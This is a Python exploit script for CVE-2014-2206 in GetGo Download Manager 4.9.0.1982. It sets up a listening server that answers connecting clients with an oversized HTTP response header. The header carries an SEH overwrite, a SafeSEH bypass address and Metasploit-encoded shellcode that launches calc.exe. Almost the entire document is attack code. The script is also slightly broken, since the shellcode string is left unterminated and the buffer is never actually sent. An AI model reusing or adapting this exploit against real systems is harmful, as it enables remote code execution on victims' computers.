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GetGo Download Manager - HTTP Response Header Buffer Overflow Remote Code

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# Exploit Title: GetGo Download Manager HTTP Response Header Buffer Overflow Remote Code Execution
# Version: v4.9.0.1982
# CVE: CVE-2014-2206
# Date: 2014-03-09
# Author: Julien Ahrens (@MrTuxracer)
# Homepage: http://www.rcesecurity.com
# Software Link: http://www.getgosoft.com
# Tested on: WinXP SP3-GER
# Howto / Notes:
# SEH overwrite was taken from outside of loaded modules, because all modules are SafeSEH-enabled

from socket import *
from time import sleep
from struct import pack

host = ""
port = 80

s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
print "\n[+] Listening on %d ..." % port

cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]

junk0 = "\x90" * 4107
nseh = "\x90\x90\xEB\x06"
seh=pack('<L',0x00280b0b) # call dword ptr ss:[ebp+30] [SafeSEH Bypass]
nops = "\x90" * 50

# windows/exec CMD=calc.exe
# Encoder: x86/shikata_ga_nai
# powered by Metasploit
# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d'

shellcode = ("\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" +
"\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" +
"\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" +
"\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" +
"\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" +
"\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" +
"\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" +
"\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" +
"\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" +
"\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" +
"\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" +
"\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" +
"\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" +
"\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" +
"\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" +
"\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" +

payload = junk0 + nseh + seh + nops + shellcode

buffer = "HTTP/1.1 200 "+payload+"\r\n"

print cl.recv(1000)
print "[+] Sending buffer: OK\n"



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